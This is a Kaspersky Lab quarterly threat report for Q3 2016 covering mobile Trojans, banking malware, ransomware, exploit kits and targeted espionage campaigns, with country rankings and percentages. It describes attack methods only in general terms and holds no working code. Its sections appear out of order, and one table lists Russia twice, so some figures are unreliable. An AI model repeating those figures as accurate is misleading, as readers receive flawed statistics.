One of the most significant events of the third quarter was the release of Pokémon GO. Of course, cybercriminals could not ignore such a popular new product and tried to exploit the game for their own purposes. This was primarily done by adding malicious code to the original app and spreading malicious versions via third-party stores. This method was used, for example, to spread Trojan-Banker.AndroidOS.Tordow, which exploits vulnerabilities in the system to obtain root access to a device. With root access, this Trojan protects itself from being deleted, and it can also steal saved passwords from browsers.

But perhaps the most notable case of Pokémon GO’s popularity being used to infect mobile devices involved fraudsters publishing a guide for the game in the official Google Play store. The app turned out to be an advertising Trojan capable of gaining root access to a device by exploiting vulnerabilities in the system.

We later came across two more modifications of this Trojan, which were added to Google Play under the guise of different apps. According to Google Play data, one of them, imitating an equalizer, was installed between 100,000 and 500,000 times.

Trojan.AndroidOS.Ztorg.ad in the official Google Play store

Interestingly, one of the methods used by the cybercriminals to promote the Trojan was a company that pays users for the installation of advertising apps.

Screenshot of the app that prompts the user to install the Trojan for 5 cents

According to this company’s rules, it doesn’t work with users whose devices have root access. The users may be looking to earn some money, but they end up with an infected device and don’t actually receive any money, because after infection the device gains root access.

Ad with a Trojan

The most popular mobile Trojan in the third quarter of 2016 was Trojan-Banker.AndroidOS.Svpeng.q. During the quarter, the number of users attacked by it grew almost eightfold.

Over 97% of users attacked by Svpeng were located in Russia. The attackers managed to make the Trojan so popular by advertising it via Google AdSense – one of the most popular advertising networks on the Russian Internet. Many popular sites use it to display targeted advertising. Anyone can pay to register their ad on the network, and that was exactly what the attackers did.

Along with the advert, however, they added the AdSense Trojan. When a user visited the page with the advert, Svpeng was downloaded to their device.

Bypassing protection mechanisms in Android 6

In our report for the second quarter of 2016 we mentioned the Trojan-Banker.AndroidOS.Asacub family that can bypass several system controls. Of special note this quarter is the Trojan-Banker.AndroidOS.Gugi family that has learned to bypass the security mechanisms introduced in Android 6 by tricking the user. The Trojan first requests rights to overlay other applications, and then uses those rights to trick the user into giving it privileges to work with text messages and to make calls.

Trojan ransomware in the Google Play store

In the third quarter, we registered the propagation of Trojan-Ransom.AndroidOS.Pletor.d, a mobile ransomware program, via Google Play. The Trojan imitated an app for servicing devices, including deleting unnecessary data, speeding up device performance and even antivirus protection.

Trojan-Ransom.AndroidOS.Pletor.d in Google Play

The Trojan checks which country the device is located in, and if it is not Russia or Ukraine, it requests administrator rights and calls the command server. Earlier versions of this Trojan encrypted user data, but this modification doesn’t possess such functionality. Instead, the Trojan blocks operation of the device by opening a window that covers all other open windows and demanding a ransom to unblock it.

Mobile threat statistics

In Q3 2016, Kaspersky Lab detected 1,520,931 malicious installation packages, which is 2.3 times fewer than in the previous quarter.

Number of detected malicious installation packages (Q4 2015 – Q1 2016)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q2 2016 and Q3 2016)

In Q3 2016, RiskTool software, or legitimate applications that are potentially dangerous to users, topped the rating of malicious objects detected for mobile devices. Their share continued to grow from 45.1% in Q2 to 55.8% this quarter.

Due to the large number of RiskTool programs and the considerable increase in their overall share of the total flow of detected objects, the proportion of almost all other types of malicious programs decreased, even where the actual number of detected programs increased compared to the previous quarter.

The most affected was Trojan-Ransom – its share decreased from 5.72% to 2.37%. This was caused by a decline in activity by the Trojan-Ransom.AndroidOS.Fusob family (covered in more detail below).

At the same time, we registered a slight growth in the share of Trojan-Bankers – from 1.88% to 1.98%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users* 1 DangerousObject.Multi.Generic 78,46 2 Trojan-Banker.AndroidOS.Svpeng.q 11,45 3 Trojan.AndroidOS.Ztorg.t 8,03 4 Backdoor.AndroidOS.Ztorg.c 7,24 5 Backdoor.AndroidOS.Ztorg.a 6,55 6 Trojan-Dropper.AndroidOS.Agent.dm 4,91 7 Trojan.AndroidOS.Hiddad.v 4,55 8 Trojan.AndroidOS.Agent.gm 4,25 9 Trojan-Dropper.AndroidOS.Agent.cv 3,67 10 Trojan.AndroidOS.Ztorg.aa 3,61 11 Trojan-Banker.AndroidOS.Svpeng.r 3,44 12 Trojan.AndroidOS.Ztorg.pac 3,31 13 Trojan.AndroidOS.Iop.c 3,27 14 Trojan.AndroidOS.Muetan.b 3,17 15 Trojan.AndroidOS.Vdloader.a 3,14 16 Trojan-Dropper.AndroidOS.Triada.s 2,80 17 Trojan.AndroidOS.Muetan.a 2,77 18 Trojan.AndroidOS.Triada.pac 2,75 19 Trojan-Dropper.AndroidOS.Triada.d 2,73 20 Trojan.AndroidOS.Agent.eb 2,63

* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place is occupied by DangerousObject.Multi.Generic (78.46%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

In Q3 2016, 17 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

In Q3 2016, attempted infections by financial #malware were registered at 1.2m users’ computers #KLreport #banking

Tweet

With root access on the device, Trojans can do many different things without the user being aware, such as installing apps from Google Play, including paid apps.

It’s worth noting that the Trojans from the Ztorg family, which occupied four places in the TOP 20, are often distributed via the official Google Play store. Since the end of 2015, we have registered more than 10 such cases (including a fake guide for Pokemon GO). Several times the Trojan notched up over 100,000 installations, and on one occasion it was installed more than 500,000 times.

Trojan.AndroidOS.Ztorg.ad masquerading as a guide for Pokemon GO in Google Play

The ranking also included two representatives of the Trojan-Banker.AndroidOS.Svpeng mobile banker family. As we mentioned above, Svpeng.q became the most popular malware in the third quarter of 2016. This was down to the Trojan being distributed via the AdSense advertising network, which is used by a large number of sites on the Russian segment of the Internet.

The geography of mobile threats

The geography of attempted mobile malware infections in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked ** 1 Bangladesh 35,57 2 Nepal 31.54 3 Iran 31.38 4 China 26.95 5 Pakistan 26.83 6 Indonesia 26.33 7 India 24,35 8 Nigeria 22.88 9 Algeria 21,82 10 The Philippines 21.67

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

Bangladesh topped the rating, with almost 36% of users there encountering a mobile threat at least once during the quarter. China, which came first in this rating two quarters in a row, dropped to fourth place.

The most popular mobile malware in all the countries of this rating (except China) was the same – advertising Trojans that mostly belonged to the Ztorg, Iop, Hiddad and Triada families. A significant proportion of attacks in China also involved advertising Trojans, but the majority of users there encountered Trojans from the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families.

Russia (12.1%) came 24th in this rating, France (6.7%) 52nd, the US (5.3%) 63rd, Italy (5.1%) 65th, Germany (4.9%) 68th, and the United Kingdom (4.7%) 71st.

The situation in Germany and Italy has improved significantly: in the previous quarter, 8.5% and 6.2% of users in those countries respectively were attacked. This was due to a decline in activity by the Fusob family of mobile ransomware.

The safest countries were Austria (3.3%), Croatia (3.1%) and Japan (1.7%).

Mobile banking Trojans

Over the reporting period, we detected 30,167 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q2.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions
(Q4 2015 – Q3 2016)

Trojan-Banker.AndroidOS.Svpeng became the most popular mobile banking Trojan in Q3 due to its active distribution via the advertising network AdSense. More than half the users that encountered mobile banking Trojans in the third quarter faced Trojan-Banker.AndroidOS.Svpeng.q. It was constantly increasing the rate at which it spread – in September the number of users attacked by the Trojan was almost eight times greater than in June.

The number of unique users attacked by the Trojan-Banker.AndroidOS.Svpeng banking Trojan family
(June-September 2016)

Over 97% of attacked users were in Russia. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking.

Geography of mobile banking threats in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked** 1 Russia 3.12 2 Australia 1.42 3 Ukraine 0.95 4 Uzbekistan 0.60 5 Tajikistan 0.56 6 Kazakhstan 0.51 7 China 0.49 8 Latvia 0.47 9 Russia 0.41 10 Belarus 0.37

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q3 2016, first place was occupied by Russia (3.12%) where the proportion of users that encountered mobile banker Trojans almost doubled from the previous quarter.

In second place again was Australia (1.42%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats.

The most widely distributed mobile banking Trojans in Q3 were representatives of the Svpeng, Faketoken, Regon, Asacub, Gugi and Grapereh families. In particular, the third quarter saw the Trojan-Banker.AndroidOS.Gugi family learn how to bypass protection mechanisms in Android by tricking users.

Mobile Ransomware

In Q3 2016, we detected 37,150 mobile Trojan-Ransomware installation packages.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q4 2015 – Q3 2016)

The sharp rise in the number of mobile Trojan-Ransomware installation packages in Q1 and Q2 of 2016 was caused by the active proliferation of the Trojan-Ransom.AndroidOS.Fusob family of Trojans. In the first quarter of 2016, this family accounted for 96% of users attacked by mobile ransomware; in Q2 it accounted for 85%. Its share in Q3 was 73%.

Number of users attacked by the Trojan-Ransom.AndroidOS.Fusob family, January-September 2016

The highest number of users attacked by the mobile Trojan-Ransomware family was registered in March 2016. Since then the amount of attacked users has been decreasing, especially in Germany.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the third quarter, accounting for nearly 53% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked ** 1 Canada 0.95 2 USA 0.94 3 Kazakhstan 0.71 4 Germany 0.63 5 UK 0.61 6 Mexico 0.58 7 Australia 0.57 8 Spain 0,54 9 Italy 0.53 10 Switzerland 0.51

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

In all the TOP 10 countries apart from Kazakhstan, the most popular Trojan-Ransom family was Fusob. In the US, the Trojan-Ransom.AndroidOS.Svpeng family was also popular. This Trojan family emerged in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng family. These Trojans demand a ransom of $100-$500 from victims to unblock their devices.

In Q3 2016, #crypto #ransomware attacks were blocked on 821,865 unique computers #KLreport

Tweet

In Kazakhstan, the main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks the operation of a device by overlaying all the windows with its own and demanding $10 to remove it.

Vulnerable apps exploited by cybercriminals

In Q3 2016, the Neutrino exploit kit departed the cybercriminal market, following in the wake of Angler and Nuclear which also left the market in the previous quarter.

RIG and Magnitude remain active. RIG was especially prominent – it has quickly filled the vacant niche on the exploit kit market.

This is the overall picture for the use of exploits this quarter:

Distribution of exploits used in attacks by the type of application attacked, Q3 2016

Exploits for different browsers and their components (45%) once again topped the rating, although their share decreased by 3 percentage points. They are followed by exploits for Android OS vulnerabilities (19%), whose share fell 5 p.p. in the third quarter. Exploits kits for Microsoft Office rounded off the top three. Their contribution actually saw an increase from 14% to 16% in Q3.

Exploits for Adobe Flash Player remained popular. In fact, their share more than doubled from 6% to 13%. This was caused by the aforementioned RIG exploit kit: its use in several campaigns saw the share of SWF exploits increase dramatically.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the third quarter of 2016, Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects (scripts, exploits, executable files, etc.) and 45,169,524 unique URLs were recognized as malicious by web antivirus components. Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1,198,264 computers in Q3 2016. The number of users attacked by financial malware increased by 5.8% from the previous quarter (1,132,031).

The third quarter is traditionally holiday season for many users of online banking services in Europe, which means the number of online payments made by these users increases during this period. This inevitably sees an increase in financial risks.

Number of users attacked by financial malware, Q3 2016

In Q3, the activity of financial threats grew month on month.

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q3 2016 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users** 1 Russia 4.20 2 Sri Lanka 3.48 3 Brazil 2.86 4 Turkey 2.77 5 Cambodia 2.59 6 Ukraine 1.90 7 Venezuela 1.90 8 Vietnam 1.86 9 Argentina 1.86 10 Uzbekistan 1.77

These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the third quarter of 2016, Russia had the highest proportion of users attacked by banking Trojans. Representatives of the Trojan-Banker ZeuS (Zbot) family, which leads the way in terms of the number of attacked users worldwide, were especially active in Russia. This is unsurprising since Russian cybercriminals are allegedly behind the development of this malware. They know the specifics of Russia’s online banking systems as well as the mentality of Russian users and take them into consideration when developing their malware. In Russia, the Gozi banking Trojan continues to proliferate. It displayed a burst of activity in the previous quarter after its developers joined forces with the creators of the Nymaim Trojan. Russia also topped the TOP 10 countries with the highest proportion of users attacked by mobile bankers.

Sri Lanka, a favorite destination with tourists, was a newcomer to the rating, going straight in at second. Financial threats were encountered by 3.48% of users in the country. Among them are likely to be foreigners who arrived in the country on holiday and used online banking services to make payments. The most active representatives of banking malware in the region were those from the Fsysna banker family. This family has previously been noted for attacks targeting customers of Latin American banks.

In Q3 2016, @kaspersky #mobile security products detected 1.5m malicious installation packages #KLreport

Tweet

Brazil rounds off the top three for the second quarter in a row. In Q2, we forecast a surge of financial threat activity in Latin America and specifically in Brazil because of this summer’s Olympic Games. However, the increase in the proportion of users attacked in Brazil was negligible: in the third quarter, 2.86% of users in Brazil encountered financial threats compared to 2.63% in Q2. At the same time, users in Argentina were subjected to a surge in malicious attacks, and as a result, the country ranked ninth.

The holiday season affected almost all countries in the TOP 10. In Russia, Ukraine and Uzbekistan, people traditionally have vacations at this time of the year, while other countries (Sri Lanka, Brazil, Turkey, Cambodia, etc.) are considered popular tourist destinations. Tourists tend to be active users of online banking systems, which in turn attracts cybercriminals and their banking malware.

The share of banking Trojan victims in Italy was 0.60%, in Spain it was 0.61%, while in Germany and the UAE the figures were 1.21% and 1.14% respectively.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users** 1 Trojan-Spy.Win32.Zbot 34.58 2 Trojan.Win32.Qhost/Trojan.BAT.Qhost 9.48 3 Trojan.Win32.Fsysna 9.467 4 Trojan-Banker.Win32.Gozi 8.98 5 Trojan.Win32.Nymaim 8.32 6 Trojan-Banker.Win32.Shiotob 5.29 7 Trojan-Banker.Win32.ChePro 3.77 8 Trojan-Banker.Win32.BestaFera 3.31 9 Trojan-Banker.Win32.Banbra 2.79 10 Trojan.Win32.Neurevt 1.79

* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

The undisputed leader of the rating is Trojan-Spy.Win32.Zbot. Its source codes have been publicly available since a leak and are now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

The family of Qhost Trojans (verdicts Trojan.Win32.Qhost and Trojan.BAT.Qhost) came second. The functionality of this family’s malicious programs is relatively simple: the Trojan modifies the content of the Host file (a special text file that contains a database of domain names that are used when transmitting to the network addresses of nodes) and as soon as specific resources are visited, the Trojan’s malicious components are loaded to an infected workstation and used to steal payment information. The Trojan adds a number of records to the Host file preventing the user’s browser from connecting to web-based apps and resources of popular antivirus vendors.

The Q3 rating also includes a new malware representative that has already demonstrated its capabilities in Sri Lanka – the Trojan.Win32.Fsysna family of banking Trojans. Members of this family, in addition to stealing payment data from infected workstations, are also used by cybercriminals to distribute spam. The Trojan uses an infected machine to redirect spam messages from the command center to a mail server. Some representatives of this family also possess Trojan cryptor functionality. Fsysna is kind of a ‘Swiss army knife’ used by cybercriminals to steal money.

Q3 2016 saw a decline in the activity of the notorious financial threat Trojan-Spy.Win32.Lurk: the number of users attacked by this malware fell by 7.1%. Lurk was not included in the TOP 10 banking malware families, but it still poses a threat to users of online banking systems. The cybercriminal group behind this financial threat has been arrested (something we wrote about in a separate article), so we expect to see a further decrease in activity by this banking Trojan next quarter.

Ransomware Trojans

Cryptors are currently one of the biggest threats to users and companies. These malicious programs are becoming more and more popular in the cybercriminal world because they are capable of generating large profits for their owners.

A total of 21 new cryptor families and 32,091 new modifications were detected in Q3. We also added several existing cryptor families to our virus collection.

The number of new cryptor families added to our virus collection is slightly less than in the second quarter (25), but the number of newly created modifications increased 3.5 times compared to the previous quarter.

The number of newly created cryptor modifications, Q1 – Q3 2016

Malware writers are constantly trying to improve their creations. New ways to infect computers are always being sought, especially for attacks on companies, which cybercriminals see as far more profitable than attacks on standard users.

Remote launching of cryptors by cybercriminals

We are increasingly seeing incidents where cybercriminals crack passwords to gain remote access to a victim’s system (usually an organization) and infect a compromised machine with Trojan ransomware. Examples of this in Q3 were Dcryptor and Xpan.

Dcryptor/Mamba

Trojan-Ransom.Win32.Dcryptor is known on the Internet under the pseudonym ‘Mamba’. Infection is carried out manually. The fraudsters brute-force the passwords for remote access to the victim machine and run the Trojan, passing on the password for encryption as a command line argument.

During infection, the Trojan uses the legitimate DiskCryptor utility. As a result, it’s not just individual files on network drives that are infected but entire hard drive sectors on the local machine. System boot is blocked: once the computer is started, a message appears on the screen demanding a ransom and displaying an email address for communicating with the attackers.

This Trojan reminds us of the notorious Petya/Mischa Trojan and continues the growing trend of cybercriminals looking for new ways to block access to data.

Xpan/TeamXRat ransomware

Trojan-Ransom.Win32.Xpan is yet another example of ransomware that is launched after attackers remotely penetrate a system. This Trojan is distributed by Brazilian cybercriminals. They brute-force the RDP password (the standard protocol for remote access to Windows computers) and infect the compromised system using the Xpan Trojan that encrypts files and displays a ransom demand.

Ransomware in scripting languages

Another trend that has attracted our attention is the growing number of cryptors written in scripting languages. In the third quarter of 2016, we came across several new families written in Python:

  • HolyCrypt (Trojan-Ransom.Python.Holy)
  • CryPy (Trojan-Ransom.Python.Kpyna)
  • Trojan-Ransom.Python.Agent

Another example that emerged in June was Stampado (Trojan-Ransom.Win32.Stampa) written in AutoIt, the automation language.

The number of users attacked by ransomware

In Q3 2016, 821,865 unique KSN users were attacked by cryptors – that is 2.6 times more than the previous quarter.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2016)

The largest contribution was made by representatives of the Trojan-Downloader.JS.Cryptoload family. These Trojan downloaders, written in JavaScript, were designed to download and install representatives of different cryptor families in the system.

Geography of Trojan-Ransomattacks in Q3 2016 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors** 1 Japan 4.83 2 Croatia 3.71 3 Korea 3.36 4 Tunisia 3.22 5 Bulgaria 3.20 6 Hong Kong 3.14 7 Taiwan 3.03 8 Argentina 2.65 9 Maldives 2.63 10 Australia 2.56

* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

As in the previous quarter, Japan topped this rating.

Newcomers to this Top 10 were Tunisia, Hong Kong, Argentina, and Australia, with Italy, Djibouti, Luxembourg, and the Netherlands all making way.

Top 10 most widespread cryptor families Name Verdict* % of attacked users** 1 CTB-Locker Trojan-Ransom.Win32.Onion/ Trojan-Ransom.NSIS.Onion 28.34 2 Locky Trojan-Ransom.Win32.Locky 9.60 3 CryptXXX Trojan-Ransom.Win32.CryptXXX 8.95 4 TeslaCrypt Trojan-Ransom.Win32.Bitman 1.44 5 Shade Trojan-Ransom.Win32.Shade 1.10 6 Cryakl Trojan-Ransom.Win32.Cryakl 0.82 7 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 0.73 8 Cerber Trojan-Ransom.Win32.Zerber 0.59 9 CryptoWall Trojan-Ransom.Win32.Cryptodef 0.58 10 Crysis Trojan-Ransom.Win32.Crusis 0.51

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

CTB-Locker once again occupied first place in the Q3. The top three also included the now infamous Locky and CryptXXX. Despite the fact that the owners of TeslaCrypt disabled their servers and posted a master key to decrypt files back in May 2016, it continues to make it into our rating (although its contribution dropped by 5.8 times in Q3)

Crysis

Crysis (verdict Trojan-Ransom.Win32.Crusis) was a newcomer to the TOP 10 in Q3. This Trojan was first detected in February 2016 and since then has undergone several code modifications.

Interestingly, the list of email addresses used for ransom demands by the distributors of Crysis partly matches the list associated with the Cryakl and Aura Trojans. Analysis of the executable files from these families, however, shows that they do not share the same code. It appears that these malicious programs are spread via a partner scheme, and because some distributors are distributing several different Trojans simultaneously they are using the same email address to communicate their ransom demands to the victims.

Polyglot/MarsJoke

This Trojan appeared in August 2016 (we recently published a detailed analysis of Polyglot/ MarsJoke). It is not included in the TOP 10, but it does have one interesting feature: the authors have tried to imitate the well-known CTB-Locker, which tops the rating for the second quarter in a row. Both the external and internal design of this piece of malware is very similar to the “original”, but the cybercriminals made a mistake that allows files to be decrypted without paying a ransom.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2016, Kaspersky Lab solutions blocked 171,802,109 attacks launched from web resources located in 190 countries around the world. 45,169,524 unique URLs were recognized as malicious by web antivirus components.

83% of notifications about blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Distribution of web attack sources by country, Q3 2016

The US (33.51%) remained top of this rating in Q3. Russia (9%) dropped from second to fourth, while Germany came second with a share of 10.5%. Canada left the Top 10, with Cyprus a newcomer in ninth place (1.24%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

In Q3 2016, 30,167 #mobile #banking Trojans were detected by @kaspersky mobile security products #KLreport

Tweet

Please note that starting this quarter, this rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked ** 1 Slovenia 30.02 2 Bulgaria 29.49 3 Armenia 29.30 4 Italy 29.21 5 Ukraine 28.18 6 Spain 28.15 7 Brazil 27.83 8 Belarus 27.06 9 Algeria 26.95 10 Qatar 26.42 11 Greece 26.10 12 Portugal 26.08 13 Russia 25.87 14 France 25.44 15 Kazakhstan 25.26 16 Azerbaijan 25.05 17 United Arab Emirates 24.97 18 Vietnam 24.73 19 China 24.19 20 Albania 23.23

These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.2% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q3 2016 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Croatia (14.21%), the UK (14.19%), Singapore (13.78%), the US (13.45%), Norway (13.07%), Czech Republic (12.80%), South Africa (11.98%), Sweden (10.96%), Korea (10.61%), the Netherlands (9.95%), Japan (9.78%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2016, Kaspersky Lab’s file antivirus detected 116,469,744 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

In Q3 2016, @kaspersky #mobile security products detected 37,150 mobile #ransomware Trojans #KLreport

Tweet

Please note that starting this quarter, the rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked** 1 Vietnam 52.07 2 Afghanistan 52.00 3 Yemen 51.32 4 Somalia 50.78 5 Ethiopia 50.50 6 Uzbekistan 50.15 7 Rwanda 50,14 8 Laos 49.27 9 Venezuela 49.27 10 Philippines 47.69 11 Nepal 47.01 12 Djibouti 46.49 13 Burundi 46,17 14 Syria 45.97 15 Bangladesh 45.48 16 Cambodia 44.51 17 Indonesia 43.31 18 Tajikistan 43,01 19 Mozambique 42.98 20 Myanmar 42.85

These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 22.9% of computers globally faced at least one Malware-class local threat during the third quarter.

The safest countries in terms of local infection risks were: Spain (14.68%), Singapore (13.86%), Italy (13.30%), Finland (10.94%), Norway (10.86%), France (10.81%), Australia ( 10.77%), Czech Republic (9.89%), Croatia (9.70%), Ireland (9.62%), Germany (9.16%), the UK (9.09%), Canada (8.92%), Sweden (8.32%), the USA (8.08%), Denmark (6.53%), and Japan (6.53%).

IT threat evolution Q3 2016

Malware Alerts - Thu, 11/03/2016 - 06:59

 Download the full report (PDF)

Overview Targeted attacks and malware campaigns Dropping Elephant

Targeted attack campaigns don’t need to be technically advanced in order to be successful. In July 2016 we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using a combination of social engineering, old exploit code and some PowerShell-based malware this group was able to steal sensitive data from its victims.

This group, which has been active since November 2015, targets high profile diplomatic and economic organizations linked to China’s foreign relations – an interest that is evident from the themes the attackers use to trap their victims.

The attackers use a combination of spear-phishing e-mails and watering-hole attacks. The first involves sending a document with remote content. When the victim opens the document, a ping request is sent to the attackers’ Command-and-Control (C2) server. The victim then receives a second spear-phishing e-mail, containing either a Word document or a PowerPoint file (these exploit old vulnerabilities – CVE-2012-0158 and CVE-2014-6352 respectively). Once the payload has been executed, a UPX-packed AutoIT executable is dropped on to the system: once executed, this downloads further components from the C2 server and the theft of data from the victim’s computer begins.

In Q3 2016, @kaspersky repelled 172m malicious attacks via online resources located in 191 countries #KLreport #Infosec

Tweet

The attackers also created a watering-hole website that downloads genuine news articles from legitimate websites. If a visitor wants to view the whole article, they are prompted to download a PowerPoint file: this reveals the rest of the document, but also asks the victim to download a malicious object. The attackers sometimes e-mail links to their watering-hole website. In addition, they maintain Google+, Facebook and Twitter accounts, to develop relevant search engine optimization (SEO) and to reach out to wider targets.

The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.

ProjectSauron

In September, our Anti-Targeted Attack Platform flagged an anomaly in the network of a customer’s organization. Further investigation led us to uncover ProjectSauron, a group that has been stealing confidential data from organizations in Russia, Iran and Rwanda – and probably other countries – since June 2011. We have identified more than 30 victims: the target organizations all play a key role in providing state services and come from government, military, scientific research, telecommunications and financial sectors.

ProjectSauron is particularly focused on obtaining access to encrypted communications, hunting for them using an advanced, modular cyber-espionage platform that incorporates a set of unique tools and techniques. The cost, complexity, persistence and the ultimate goal of the operation (i.e. stealing secret data from state-related organizations) suggest that ProjectSauron is a state-sponsored campaign. ProjectSauron gives the impression of an experienced threat group that has made a considerable effort to learn from other highly advanced attacks, including Duqu, Flame, Equation and Regin – adopting some of their most innovative techniques and improving on their tactics in order to remain undiscovered.

